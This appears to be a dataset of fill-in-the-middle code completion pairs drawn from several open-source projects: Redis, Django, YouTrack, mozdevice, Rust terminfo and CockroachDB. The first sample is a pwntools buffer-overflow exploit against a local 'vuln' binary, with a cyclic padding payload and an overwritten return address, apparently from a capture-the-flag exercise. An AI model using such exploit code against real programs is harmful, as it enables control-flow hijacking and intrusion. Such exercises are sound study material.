prompt
large_stringlengths
70
991k
completion
large_stringlengths
0
1.02k
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # This exploit template was generated via: # $ pwn template ./vuln from pwn import * # Set up pwntools for the correct architecture exe = context.binary = ELF('./vuln') def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw) gdbscript = ''' break *0x{exe.symbols.main:x} continue '''.format(**locals())<|fim▁hole|>#payload = 'A'*64 payload += p32(0x80485e6) io.sendline(payload) io.interactive()<|fim▁end|>
io = start() payload = cyclic(76)
<|file_name|>rediswrapper.cpp<|end_file_name|><|fim▁begin|>// Copyright (c) 2014 kingsoft #include <stdio.h> #include <stdlib.h> #include <string> #include "hiredis/adapters/libuv.h" #include "hiredis/hiredis.h" #include "hiredis/async.h" #include "./rediswrapper.h" #ifndef see_here #define see_here dba_err("check here [%s:%d:%s]\n", __FILE__, __LINE__, __func__) #endif #ifndef dba_dbg #define dba_dbg(fmt, ...) \ fprintf(stdout, fmt, ##__VA_ARGS__); #endif #ifndef dba_err #define dba_err(fmt, ...) \ fprintf(stderr, fmt, ##__VA_ARGS__); #endif namespace immortal { namespace db { using std::string; std::tuple<string, uint16_t> ParseAddr(const string& addr); static void ConnectCallback(const redisAsyncContext *c, int status) { if (status != REDIS_OK) { fprintf(stderr, "Error: %s\n", c->errstr); auto r = (RedisClient *)c->data; r->InitRedis(); return; } printf("Connected...\n"); } static void DisconnectCallback(const redisAsyncContext *c, int status) { if (status != REDIS_OK) { fprintf(stderr, "Error: %s\n", c->errstr); }<|fim▁hole|> printf("Disconnected...and try to reconnect\n"); auto r = (RedisClient *)c->data; r->InitRedis(); } static void RedisSetCallback2(redisAsyncContext *c, void *r, void *privdata) { uint32_t seq = (uintptr_t)privdata; auto cb = ((RedisClient *)c->data)->cb_; redisReply *reply = (redisReply *)r; int err = 0; if (reply == NULL) { dba_err("redis bug!? reply is NULL\n"); err = -1; return; } else if (reply->type != REDIS_REPLY_STATUS) { dba_err("redis bug!? HMSET reply should be status, but %d\n", reply->type); } else { // dba_dbg("%s\n", reply->str); } cb(seq, NULL, 0, err); } static void RedisCommandCallback(redisAsyncContext *c, void *r, void *privdata) { uint32_t seq = (uintptr_t)privdata; auto cb = ((RedisClient *)c->data)->cb_; redisReply *reply = (redisReply *)r; int err = 0; if (reply == NULL) { dba_err("redis bug!? reply is NULL\n"); err = -1; return; } else if (reply->type == REDIS_REPLY_STATUS) { } else { } cb(seq, NULL, 0, err); } static void RedisGetCallback2(redisAsyncContext *c, void *r, void *privdata) { uint32_t seq = (uintptr_t)privdata; auto cb = ((RedisClient *)c->data)->cb_; redisReply *reply = (redisReply *)r; int err = 0; if (reply == NULL) { dba_err("redis bug!? reply is NULL\n"); return; } else if (reply->type == REDIS_REPLY_NIL) { // dba_dbg("no data\n"); } else if (reply->type != REDIS_REPLY_STRING) { dba_err("redis bug!? GET reply should be str, but %d\n", reply->type); err = -1; } cb(seq, reply->str, reply->len, err); } int RedisClient::Get(uint32_t seq, const char *key) { int r; r = redisAsyncCommand(redis_ctx_, RedisGetCallback2, (void *)(uintptr_t)seq, "GET %s", key); if (r != 0) { dba_err("redisAsyncCommand GET error\n"); return -1; } return 0; } int RedisClient::Set(uint32_t seq, const char *key, const char *buf, size_t len) { int r; r = redisAsyncCommand(redis_ctx_, RedisSetCallback2, (void *)(uintptr_t)seq, "SET %s %b", key, buf, len); if (r != 0) { dba_err("redisAsyncCommand SET error\n"); return -1; } return 0; } int RedisClient::Del(uint32_t seq, const char *key) { int r; r = redisAsyncCommand(redis_ctx_, RedisSetCallback2, (void *)(uintptr_t)seq, "DEL %s", key); if (r != 0) { dba_err("redisAsyncCommand DEL error\n"); return -1; } return 0; } int RedisClient::Command(uint32_t seq, const char *fmt, ...) { int r; va_list ap; va_start(ap, fmt); r = redisvAsyncCommand(redis_ctx_, RedisCommandCallback, (void *)(uintptr_t)seq, fmt, ap); va_end(ap); if (r != 0) { dba_err("redisvAsyncCommand error\n"); return -1; } return 0; } #if 0 int RedisClient::HSet(Handle *req, google::protobuf::Message *msg) { dbaproto::Record *save = (dbaproto::Record *)(msg); // TODO(lijie3): select redis conn by table name req->data = dba_; int r; // Start copy save to redis protocol // COMMAND KEY args... int argc = 2 + save->values_size() * 2; const char **argv = (const char **)malloc(sizeof(char *) * argc); size_t *argvlen = (size_t *)malloc(sizeof(size_t) * argc); // set command argv[0] = "HMSET"; argvlen[0] = strlen(argv[0]); // set key argv[1] = save->key().value().c_str(); argvlen[1] = save->key().value().size(); // set args for (int i = 0, j = 2; i < save->values_size(); i++) { argv[j] = (char *)(save->values(i).field().c_str()); argvlen[j] = save->values(i).field().size(); j++; argv[j] = (char *)(save->values(i).value().c_str()); argvlen[j] = save->values(i).value().size(); j++; } r = redisAsyncCommandArgv(redis_ctx_, RedisHSetCallback, req, argc, argv, argvlen); free(argv); free(argvlen); if (r != 0) { fprintf(stderr, "redisAsyncCommand HMSET error\n"); return -1; } return 0; } #endif int RedisClient::InitRedis() { printf("connect redis %s:%d\n", ip_.c_str(), port_); redis_ctx_ = redisAsyncConnect(ip_.c_str(), port_); if (redis_ctx_->err) { fprintf(stderr, "Error: %s\n", redis_ctx_->errstr); redisAsyncFree(redis_ctx_); return -1; } int r = redisLibuvAttach(redis_ctx_, loop_); if (r != REDIS_OK) { fprintf(stderr, "redis attach to libuv failed\n"); redisAsyncFree(redis_ctx_); return -1; } // save current env redis_ctx_->data = (void *)this; redisAsyncSetConnectCallback(redis_ctx_, ConnectCallback); redisAsyncSetDisconnectCallback(redis_ctx_, DisconnectCallback); return 0; } int RedisClient::Init(RedisCallback_t cb, void *loop, const std::string& ip, uint32_t port) { cb_ = cb; loop_ = (uv_loop_t *)loop; ip_ = ip; port_ = port; return InitRedis(); } int RedisClient::Init(RedisCallback_t cb, void *loop, const std::string& url) { auto tup = ParseAddr(url); auto ip = std::get<0>(tup); auto port = std::get<1>(tup); return Init(cb, loop, ip, port); } } // namespace dba } // namespace immortal<|fim▁end|>
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import #from urllib.parse import urlparse, urlunparse from builtins import str from builtins import range from django.conf import settings # Avoid shadowing the login() and logout() views below. from django.contrib.auth import ( REDIRECT_FIELD_NAME, get_user_model, login as auth_login, logout as auth_logout, update_session_auth_hash, ) from django.contrib.auth.decorators import login_required from django.contrib.auth.forms import ( AuthenticationForm, PasswordChangeForm, PasswordResetForm, SetPasswordForm,AdminPasswordChangeForm, ) from django.contrib.auth.tokens import default_token_generator from django.contrib.sites.shortcuts import get_current_site from django.http import HttpResponseRedirect, QueryDict from django.shortcuts import resolve_url from django.shortcuts import render from django.template.response import TemplateResponse from django.urls import reverse, reverse_lazy from django.utils.decorators import method_decorator #from django.utils.deprecation import RemovedInDjango21Warning from django.utils.encoding import force_text from django.utils.http import is_safe_url, urlsafe_base64_decode from django.utils.translation import gettext_lazy as _ from django.views.decorators.cache import never_cache from django.views.decorators.csrf import csrf_protect from django.views.decorators.debug import sensitive_post_parameters from django.views.generic.base import TemplateView from django.views.generic.edit import FormView UserModel = get_user_model() from django.contrib.auth.models import User from django.http import HttpResponse from django.template import loader import random import string #import user from .forms import UserForm from stack_configs.stack_functions import createInfluxDB from stack_configs.ldap_functions import addToLDAPGroup,resetLDAPpassword,createLDAPuser from stack_configs.grafana_functions import GrafanaUser,testObj import logging logger = logging.getLogger(__name__) # Create your views here. # Create your views here. #from django.contrib.auth.forms import UserCreationForm def index(request): template = loader.get_template('welcome.html') result="welcome" context = { 'content':result, 'has_permission':request.user.is_authenticated, 'is_popup':False, 'title':'welcome!', 'site_title':'zibawa', 'site_url':settings.SITE_URL } return HttpResponse(template.render(context, request)) def create_account(request): template = loader.get_template('admin/base_site.html') if request.method == "POST": form = UserForm(request.POST) if form.is_valid(): password = form.cleaned_data['password'] new_user = User.objects.create_user(**form.cleaned_data) #new_user.is_staff=True #new_user.save() if (createLDAPuser(new_user,password)): if (addToLDAPGroup(new_user.username,'active')): if (addToLDAPGroup(new_user.username,'editor')): result=createAndConfigureGrafana(new_user,password) if (result.status): if createInfluxDB(new_user): #creates a user database in influx return HttpResponseRedirect('/thanks/') return HttpResponseRedirect('/account_create_error/') else: form = UserForm() context = { 'has_permission':request.user.is_authenticated, 'is_popup':False, 'form':form, 'title':'New User Creation', 'site_title':'zibawa', 'site_url':settings.SITE_URL } return render(request,'form.html',context) def thanks(request): template = loader.get_template('thanks.html') context = { 'content':'Thanks. Please log in to your dashboard', 'title':'Your account has been created', 'is_popup':False, 'has_permission':request.user.is_authenticated, 'site_title':'zibawa', 'site_url':settings.SITE_URL } return HttpResponse(template.render(context, request)) def account_create_error(request): template = loader.get_template('admin/base_site.html') context = { 'content':'Sorry. Something went wrong during the creation of your account. Please contact your administrator', 'title':'Error', 'is_popup':False, 'has_permission':request.user.is_authenticated, 'site_title':'zibawa', 'site_url':settings.SITE_URL } return HttpResponse(template.render(context, request)) def id_generator(size=10, chars=string.ascii_uppercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) # Doesn't need csrf_protect since no-one can guess the URL @sensitive_post_parameters() @never_cache def zibawa_password_reset_confirm(request, uidb64=None, token=None, template_name='registration/password_reset_confirm.html', token_generator=default_token_generator, set_password_form=SetPasswordForm,<|fim▁hole|> post_reset_redirect=None, extra_context=None): """ ZIBAWA NOTE. THIS VIEW CODE IS COPIED FROM DJANGO DEFAULT VIEW WITH MINOR MODIFICATIONS TO UPDATE PASSWORD IN LDAP (INSTEAD OF THE DJANGO DATABASE) https://github.com/django/django/blob/master/django/contrib/auth/views.py Check the hash in a password reset link and present a form for entering a new password. warnings.warn("The password_reset_confirm() view is superseded by the " "class-based PasswordResetConfirmView().", RemovedInDjango21Warning, stacklevel=2)""" assert uidb64 is not None and token is not None # checked by URLconf if post_reset_redirect is None: post_reset_redirect = reverse('password_reset_complete') else: post_reset_redirect = resolve_url(post_reset_redirect) try: # urlsafe_base64_decode() decodes to bytestring uid = force_text(urlsafe_base64_decode(uidb64)) user = UserModel._default_manager.get(pk=uid) except (TypeError, ValueError, OverflowError, UserModel.DoesNotExist): user = None if user is not None and token_generator.check_token(user, token): validlink = True title = _('Enter new password') if request.method == 'POST': form = set_password_form(user, request.POST) if form.is_valid(): form.save() #ZIBAWA MODIFICATIONS START HERE new_password = form.cleaned_data['new_password1'] if(resetLDAPpassword(user.username,new_password)): #change Grafana password grafana_user=GrafanaUser(request.user.id, request.user.username,new_password,request.user.email) logger.debug('resetting Grafana password for %s',request.user.username) if not (grafana_user.changeGrafanaPassword()): #if fails, currently we log but carry on regardless. logger.warning('couldnt reset Grafana password for %s',request.user.username) return HttpResponseRedirect(post_reset_redirect) else: #if result from LDAP is not what we expect, or if no result logger.warning('couldnt reset LDAP password') title = _('Could not reset LDAP password') #ZIBAWA MODIFICATIONS END HERE else: form = set_password_form(user) else: validlink = False form = None title = _('Password reset unsuccessful') context = { 'form': form, 'title': title, 'validlink': validlink, 'is_popup':False, 'has_permission':request.user.is_authenticated, 'site_title':'zibawa', 'site_url':settings.SITE_URL } if extra_context is not None: context.update(extra_context) return TemplateResponse(request, template_name, context) @sensitive_post_parameters() @csrf_protect @login_required def zibawa_password_change(request, template_name='registration/password_change_form.html', post_change_redirect=None, password_change_form=SetPasswordForm, extra_context=None): '''warnings.warn("The password_change() view is superseded by the " "class-based PasswordChangeView().", RemovedInDjango21Warning, stacklevel=2)''' if post_change_redirect is None: post_change_redirect = reverse('password_change_done') else: post_change_redirect = resolve_url(post_change_redirect) if request.method == "POST": form = password_change_form(user=request.user, data=request.POST) if form.is_valid(): form.save() # Updating the password logs out all other sessions for the user # except the current one. #ZIBAWA MODIFICATIONS START HERE new_password = form.cleaned_data['new_password1'] if(resetLDAPpassword(request.user.username,new_password)): logger.debug('reset LDAP password') update_session_auth_hash(request, form.user) #change Grafana password grafana_user=GrafanaUser(request.user.id, request.user.username,new_password,request.user.email) logger.debug('resetting Grafana password for %s',request.user.username) if not (grafana_user.changeGrafanaPassword()): #if fails, currently we carry on regardless. logger.warning('couldnt reset Grafana password for %s',request.user.username) return HttpResponseRedirect(post_change_redirect) #if result from LDAP is not what we expect, or if no result else: logger.warning('couldnt reset LDAP password') context = { 'form': form, 'title': _('Could not reset LDAP password'), 'is_popup':False, 'has_permission':request.user.is_authenticated, 'site_title':'zibawa', 'site_url':settings.SITE_URL } return TemplateResponse(request, template_name, context) #ZIBAWA MODIFICATIONS END HERE else: form = password_change_form(user=request.user) context = { 'form': form, 'title': _('Password change'), 'is_popup':False, 'has_permission':request.user.is_authenticated, 'site_title':'zibawa', 'site_url':settings.SITE_URL } if extra_context is not None: context.update(extra_context) return TemplateResponse(request, template_name, context) def createAndConfigureGrafana(zibawa_user,password): grafana_user=GrafanaUser(zibawa_user.id, zibawa_user.username,password,zibawa_user.email) result=testObj("GrafanaAccount",True,"Your account already exists on Grafana from a previous installation please contact your administrator") if not (grafana_user.exists()): result=testObj("GrafanaAccount",False,"We were unable to create your dashboard account on Grafana, please contact your adminitrator") logger.info('trying to create grafana user') if grafana_user.create(): result=testObj("GrafanaAccount",True, "Your account has been created, but not configured") logger.info("trying to find non grafana admin org") if not (grafana_user.get_orgID()): logger.info("no org found for user, adding to own org") grafana_user.add_to_own_org() #run get org id again, to ensure created correctly. grafana_user.get_orgID() logger.info("running fix permissions for Grafana") grafana_user.fix_permissions() logger.info("running add datasource for Grafana") if (grafana_user.add_datasource()): result=testObj("GrafanaAccount",True,"Your account has been created and configured") return result<|fim▁end|>
<|file_name|>import_helper.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- from youtrack import YouTrackException def utf8encode(source): if isinstance(source, str): source = source.encode('utf-8') return source def _create_custom_field_prototype(connection, cf_type, cf_name, auto_attached=False, additional_params=None): if additional_params is None: additional_params = dict([]) field = _get_custom_field(connection, cf_name) if field is not None: if field.type != cf_type: msg = "Custom field with name [ %s ] already exists. It has type [ %s ] instead of [ %s ]" % \ (utf8encode(cf_name), field.type, cf_type) raise LogicException(msg) else: connection.create_custom_field_detailed(cf_name, cf_type, False, True, auto_attached, additional_params) def _get_custom_field(connection, cf_name): existing_fields = [item for item in connection.get_custom_fields() if utf8encode(item.name).lower() == utf8encode(cf_name).lower()] if len(existing_fields): return existing_fields[0] return None def create_custom_field(connection, cf_type, cf_name, auto_attached, value_names=None, bundle_policy="0"): """ Creates custom field prototype(if not exist) and sets default values bundle if needed Args: connection: An opened Connection instance. cf_type: Type of custom field to be created cf_name: Name of custom field that should be created (if not exists) auto_attached: If this field should be auto attached or not. value_names: Values, that should be attached with this cf by default. If None, no bundle is created to this field, if empty, empty bundle is created. bundle_policy: ??? Raises: LogicException: If custom field already exists, but has wrong type. YouTrackException: If something is wrong with queries. """ if (value_names is None) and (not auto_attached or "[" not in cf_type): _create_custom_field_prototype(connection, cf_type, cf_name, auto_attached) return if value_names is None: value_names = set([]) else: value_names = set(value_names) field = _get_custom_field(connection, cf_name) if field is not None: if hasattr(field, "defaultBundle"): bundle = connection.get_bundle(field.type, field.defaultBundle) elif field.autoAttached: return else: bundle = create_bundle_safe(connection, cf_name + "_bundle", cf_type) else: bundle = create_bundle_safe(connection, cf_name + "_bundle", cf_type) _create_custom_field_prototype(connection, cf_type, cf_name, auto_attached, {"defaultBundle": bundle.name, "attachBundlePolicy": bundle_policy}) for value_name in value_names: try: connection.add_value_to_bundle(bundle, value_name) except YouTrackException: pass # # values_to_add = calculate_missing_value_names(bundle, value_names) # [connection.addValueToBundle(bundle, name) for name in values_to_add] # if field is None: # bundle_name = cf_name + "_bundle" # _create_bundle_safe(connection, bundle_name, cf_type) # bundle = connection.getBundle(cf_type, bundle_name) # values_to_add = calculate_missing_value_names(bundle, value_names) # # # for value in values_to_add: # connection.addValueToBundle(bundle, value) # # def process_custom_field(connection, project_id, cf_type, cf_name, value_names=None): """ Creates custom field and attaches it to the project. If custom field already exists and has type cf_type it is attached to the project. If it has another type, LogicException is raised. If project field already exists, uses it and bundle from it. If not, creates project field and bundle with name <cf_name>_bundle_<project_id> for it. Adds value_names to bundle. Args: connection: An opened Connection instance. project_id: Id of the project to attach CF to. cf_type: Type of cf to be created. cf_name: Name of cf that should be created (if not exists) and attached to the project (if not yet attached) value_names: Values, that cf must have. If None, does not create any bundle for the field. If empty list, creates bundle, but does not create any value_names in it. If bundle already contains some value_names, only value_names that do not already exist are added. Raises: LogicException: If custom field already exists, but has wrong type. YouTrackException: If something is wrong with queries. """ _create_custom_field_prototype(connection, cf_type, cf_name) if cf_type[0:-3] not in connection.bundle_types: value_names = None elif value_names is None: value_names = [] existing_project_fields = [item for item in connection.getProjectCustomFields(project_id) if utf8encode(item.name) == cf_name] if len(existing_project_fields): if value_names is None: return bundle = connection.getBundle(cf_type, existing_project_fields[0].bundle)<|fim▁hole|> values_to_add = calculate_missing_value_names(bundle, value_names) else: if value_names is None: connection.createProjectCustomFieldDetailed(project_id, cf_name, "No " + cf_name) return bundle = create_bundle_safe(connection, cf_name + "_bundle_" + project_id, cf_type) values_to_add = calculate_missing_value_names(bundle, value_names) connection.createProjectCustomFieldDetailed(project_id, cf_name, "No " + cf_name, params={"bundle": bundle.name}) for name in values_to_add: connection.addValueToBundle(bundle, bundle.createElement(name)) def add_values_to_bundle_safe(connection, bundle, values): """ Adds values to specified bundle. Checks, whether each value already contains in bundle. If yes, it is not added. Args: connection: An opened Connection instance. bundle: Bundle instance to add values in. values: Values, that should be added in bundle. Raises: YouTrackException: if something is wrong with queries. """ for value in values: try: connection.addValueToBundle(bundle, value) except YouTrackException as e: if e.response.status == 409: print("Value with name [ %s ] already exists in bundle [ %s ]" % (utf8encode(value.name), utf8encode(bundle.name))) else: raise e def create_bundle_safe(connection, bundle_name, bundle_type): bundle = connection.bundle_types[bundle_type[0:-3]](None, None) bundle.name = bundle_name try: connection.createBundle(bundle) except YouTrackException as e: if e.response.status == 409: print("Bundle with name [ %s ] already exists" % bundle_name) else: raise e return connection.getBundle(bundle_type, bundle_name) def calculate_missing_value_names(bundle, value_names): bundle_elements_names = [elem.name.lower() for elem in bundle.values] return [value for value in value_names if value.lower() not in bundle_elements_names] class LogicException(Exception): def __init__(self, msg): Exception.__init__(self, msg)<|fim▁end|>
<|file_name|>setup.py<|end_file_name|><|fim▁begin|># This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. from setuptools import setup PACKAGE_NAME = 'mozdevice' PACKAGE_VERSION = '0.44' deps = ['mozfile >= 1.0', 'mozlog >= 2.1',<|fim▁hole|> 'mozprocess >= 0.19', ] setup(name=PACKAGE_NAME, version=PACKAGE_VERSION, description="Mozilla-authored device management", long_description="see http://mozbase.readthedocs.org/", classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers keywords='', author='Mozilla Automation and Testing Team', author_email='[email protected]', url='https://wiki.mozilla.org/Auto-tools/Projects/Mozbase', license='MPL', packages=['mozdevice'], include_package_data=True, zip_safe=False, install_requires=deps, entry_points=""" # -*- Entry points: -*- [console_scripts] dm = mozdevice.dmcli:cli sutini = mozdevice.sutini:main """, )<|fim▁end|>
'moznetwork >= 0.24',
<|file_name|>searcher.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. //! ncurses-compatible database discovery //! //! Does not support hashed database, only filesystem! use std::io::File; use std::io::fs::PathExtensions; use std::os::getenv; use std::os; /// Return path to database entry for `term` pub fn get_dbpath_for_term(term: &str) -> Option<Box<Path>> { if term.len() == 0 { return None; } let homedir = os::homedir(); let mut dirs_to_search = Vec::new(); let first_char = term.char_at(0); // Find search directory match getenv("TERMINFO") { Some(dir) => dirs_to_search.push(Path::new(dir)), None => { if homedir.is_some() { // ncurses compatibility; dirs_to_search.push(homedir.unwrap().join(".terminfo")) } match getenv("TERMINFO_DIRS") { Some(dirs) => for i in dirs.split(':') { if i == "" { dirs_to_search.push(Path::new("/usr/share/terminfo")); } else { dirs_to_search.push(Path::new(i)); } }, // Found nothing in TERMINFO_DIRS, use the default paths: // According to /etc/terminfo/README, after looking at // ~/.terminfo, ncurses will search /etc/terminfo, then // /lib/terminfo, and eventually /usr/share/terminfo. None => { dirs_to_search.push(Path::new("/etc/terminfo")); dirs_to_search.push(Path::new("/lib/terminfo")); dirs_to_search.push(Path::new("/usr/share/terminfo")); } } } }; // Look for the terminal in all of the search directories for p in dirs_to_search.iter() { if p.exists() { let f = first_char.to_string(); let newp = p.join_many(&[&f[], term]); if newp.exists() { return Some(box newp); } // on some installations the dir is named after the hex of the char (e.g. OS X) let f = format!("{:x}", first_char as uint); let newp = p.join_many(&[&f[], term]); if newp.exists() { return Some(box newp); } } } None } /// Return open file for `term` pub fn open(term: &str) -> Result<File, String> { match get_dbpath_for_term(term) { Some(x) => { match File::open(&*x) { Ok(file) => Ok(file), Err(e) => Err(format!("error opening file: {:?}", e)), } } None => { Err(format!("could not find terminfo entry for {:?}", term)) } } } #[test] #[ignore(reason = "buildbots don't have ncurses installed and I can't mock everything I need")] fn test_get_dbpath_for_term() { // woefully inadequate test coverage // note: current tests won't work with non-standard terminfo hierarchies (e.g. OS X's) use std::os::{setenv, unsetenv}; // FIXME (#9639): This needs to handle non-utf8 paths fn x(t: &str) -> String { let p = get_dbpath_for_term(t).expect("no terminfo entry found"); p.as_str().unwrap().to_string() }; assert!(x("screen") == "/usr/share/terminfo/s/screen"); assert!(get_dbpath_for_term("") == None); setenv("TERMINFO_DIRS", ":"); assert!(x("screen") == "/usr/share/terminfo/s/screen"); unsetenv("TERMINFO_DIRS"); } #[test] #[ignore(reason = "see test_get_dbpath_for_term")] fn test_open() { open("screen").unwrap();<|fim▁hole|>}<|fim▁end|>
let t = open("nonexistent terminal that hopefully does not exist"); assert!(t.is_err());
<|file_name|>txn.go<|end_file_name|><|fim▁begin|>// Copyright 2015 The Cockroach Authors. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or // implied. See the License for the specific language governing // permissions and limitations under the License. // // Author: Peter Mattis ([email protected]) package client import ( "strconv" "time" "golang.org/x/net/context" "github.com/cockroachdb/cockroach/roachpb" "github.com/cockroachdb/cockroach/util" "github.com/cockroachdb/cockroach/util/caller" "github.com/cockroachdb/cockroach/util/log" "github.com/cockroachdb/cockroach/util/retry" "github.com/cockroachdb/cockroach/util/tracing" "github.com/gogo/protobuf/proto" basictracer "github.com/opentracing/basictracer-go" ) // DefaultTxnRetryOptions are the standard retry options used // for transactions. // This is exported for testing purposes only. var DefaultTxnRetryOptions = retry.Options{ InitialBackoff: 50 * time.Millisecond, MaxBackoff: 5 * time.Second, Multiplier: 2, } // txnSender implements the Sender interface and is used to keep the Send // method out of the Txn method set. type txnSender Txn // Send updates the transaction on error. Depending on the error type, the // transaction might be replaced by a new one. func (ts *txnSender) Send(ctx context.Context, ba roachpb.BatchRequest) (*roachpb.BatchResponse, *roachpb.Error) { // Send call through wrapped sender. ba.Txn = &ts.Proto // For testing purposes, ts.UserPriority can be a negative value (see // MakePriority). if ts.UserPriority != 0 { ba.UserPriority = ts.UserPriority } br, pErr := ts.wrapped.Send(ts.Context, ba) if br != nil && br.Error != nil { panic(roachpb.ErrorUnexpectedlySet(ts.wrapped, br)) } if br != nil { for _, encSp := range br.CollectedSpans { var newSp basictracer.RawSpan if err := tracing.DecodeRawSpan(encSp, &newSp); err != nil { return nil, roachpb.NewError(err) } ts.CollectedSpans = append(ts.CollectedSpans, newSp) } } // Only successful requests can carry an updated Txn in their response // header. Any error (e.g. a restart) can have a Txn attached to them as // well; those update our local state in the same way for the next attempt. // The exception is if our transaction was aborted and needs to restart // from scratch, in which case we do just that. if pErr == nil { ts.Proto.Update(br.Txn) return br, nil } else if _, ok := pErr.GetDetail().(*roachpb.TransactionAbortedError); ok { // On Abort, reset the transaction so we start anew on restart. ts.Proto = roachpb.Transaction{ TxnMeta: roachpb.TxnMeta{ Isolation: ts.Proto.Isolation, }, Name: ts.Proto.Name, } // Acts as a minimum priority on restart. if pErr.GetTxn() != nil { ts.Proto.Priority = pErr.GetTxn().Priority } } else if pErr.TransactionRestart != roachpb.TransactionRestart_NONE { ts.Proto.Update(pErr.GetTxn()) } return nil, pErr } // Txn is an in-progress distributed database transaction. A Txn is not safe for // concurrent use by multiple goroutines. type Txn struct { db DB wrapped Sender Proto roachpb.Transaction UserPriority roachpb.UserPriority Context context.Context // must not be nil CollectedSpans []basictracer.RawSpan // systemConfigTrigger is set to true when modifying keys from the SystemConfig // span. This sets the SystemConfigTrigger on EndTransactionRequest. systemConfigTrigger bool retrying bool } // NewTxn returns a new txn. func NewTxn(db DB) *Txn { txn := &Txn{ db: db, wrapped: db.sender, Context: context.Background(), } txn.db.sender = (*txnSender)(txn) return txn } // SetDebugName sets the debug name associated with the transaction which will // appear in log files and the web UI. Each transaction starts out with an // automatically assigned debug name composed of the file and line number where // the transaction was created. func (txn *Txn) SetDebugName(name string, depth int) { file, line, fun := caller.Lookup(depth + 1) if name == "" { name = fun } txn.Proto.Name = file + ":" + strconv.Itoa(line) + " " + name } // DebugName returns the debug name associated with the transaction. func (txn *Txn) DebugName() string { return txn.Proto.Name } // SetIsolation sets the transaction's isolation type. Transactions default to // serializable isolation. The isolation must be set before any operations are // performed on the transaction. func (txn *Txn) SetIsolation(isolation roachpb.IsolationType) error { if txn.retrying { if txn.Proto.Isolation != isolation { return util.Errorf("cannot change the isolation level of a retrying transaction") } return nil } if txn.Proto.IsInitialized() { return util.Errorf("cannot change the isolation level of a running transaction") } txn.Proto.Isolation = isolation return nil } // SetUserPriority sets the transaction's user priority. Transactions default to // normal user priority. The user priority must be set before any operations are // performed on the transaction. func (txn *Txn) SetUserPriority(userPriority roachpb.UserPriority) error { if txn.retrying { if txn.UserPriority != userPriority { return util.Errorf("cannot change the user priority of a retrying transaction") } return nil } if txn.Proto.IsInitialized() { return util.Errorf("cannot change the user priority of a running transaction") } if userPriority < roachpb.MinUserPriority || userPriority > roachpb.MaxUserPriority { return util.Errorf("the given user priority %f is out of the allowed range [%f, %d]", userPriority, roachpb.MinUserPriority, roachpb.MaxUserPriority) } txn.UserPriority = userPriority return nil } // InternalSetPriority sets the transaction priority. It is intended for // internal (testing) use only. func (txn *Txn) InternalSetPriority(priority int32) { // The negative user priority is translated on the server into a positive, // non-randomized, priority for the transaction. txn.UserPriority = roachpb.UserPriority(-priority) } // SetSystemConfigTrigger sets the system db trigger to true on this transaction. // This will impact the EndTransactionRequest. func (txn *Txn) SetSystemConfigTrigger() { txn.systemConfigTrigger = true } // SystemConfigTrigger returns the systemConfigTrigger flag. func (txn *Txn) SystemConfigTrigger() bool { return txn.systemConfigTrigger } // NewBatch creates and returns a new empty batch object for use with the Txn. func (txn *Txn) NewBatch() *Batch { return &Batch{DB: &txn.db, txn: txn} } // Get retrieves the value for a key, returning the retrieved key/value or an // error. // // r, err := db.Get("a") // // string(r.Key) == "a" // // key can be either a byte slice or a string. func (txn *Txn) Get(key interface{}) (KeyValue, *roachpb.Error) { b := txn.NewBatch() b.Get(key) return runOneRow(txn, b) } // GetProto retrieves the value for a key and decodes the result as a proto // message. // // key can be either a byte slice or a string. func (txn *Txn) GetProto(key interface{}, msg proto.Message) *roachpb.Error { r, pErr := txn.Get(key) if pErr != nil { return pErr } return roachpb.NewError(r.ValueProto(msg)) } // Put sets the value for a key // // key can be either a byte slice or a string. value can be any key type, a // proto.Message or any Go primitive type (bool, int, etc). func (txn *Txn) Put(key, value interface{}) *roachpb.Error { b := txn.NewBatch() b.Put(key, value) _, pErr := runOneResult(txn, b) return pErr } // CPut conditionally sets the value for a key if the existing value is equal // to expValue. To conditionally set a value only if there is no existing entry // pass nil for expValue. Note that this must be an interface{}(nil), not a // typed nil value (e.g. []byte(nil)). // // key can be either a byte slice or a string. value can be any key type, a // proto.Message or any Go primitive type (bool, int, etc). func (txn *Txn) CPut(key, value, expValue interface{}) *roachpb.Error { b := txn.NewBatch() b.CPut(key, value, expValue) _, pErr := runOneResult(txn, b) return pErr } // Inc increments the integer value at key. If the key does not exist it will // be created with an initial value of 0 which will then be incremented. If the // key exists but was set using Put or CPut an error will be returned. // // The returned Result will contain a single row and Result.Err will indicate // success or failure. // // key can be either a byte slice or a string. func (txn *Txn) Inc(key interface{}, value int64) (KeyValue, *roachpb.Error) { b := txn.NewBatch() b.Inc(key, value) return runOneRow(txn, b) } func (txn *Txn) scan(begin, end interface{}, maxRows int64, isReverse bool) ([]KeyValue, *roachpb.Error) { b := txn.NewBatch() if !isReverse { b.Scan(begin, end, maxRows) } else { b.ReverseScan(begin, end, maxRows) } r, pErr := runOneResult(txn, b) return r.Rows, pErr } // Scan retrieves the rows between begin (inclusive) and end (exclusive) in // ascending order. // // The returned []KeyValue will contain up to maxRows elements. // // key can be either a byte slice or a string. func (txn *Txn) Scan(begin, end interface{}, maxRows int64) ([]KeyValue, *roachpb.Error) { return txn.scan(begin, end, maxRows, false) } // ReverseScan retrieves the rows 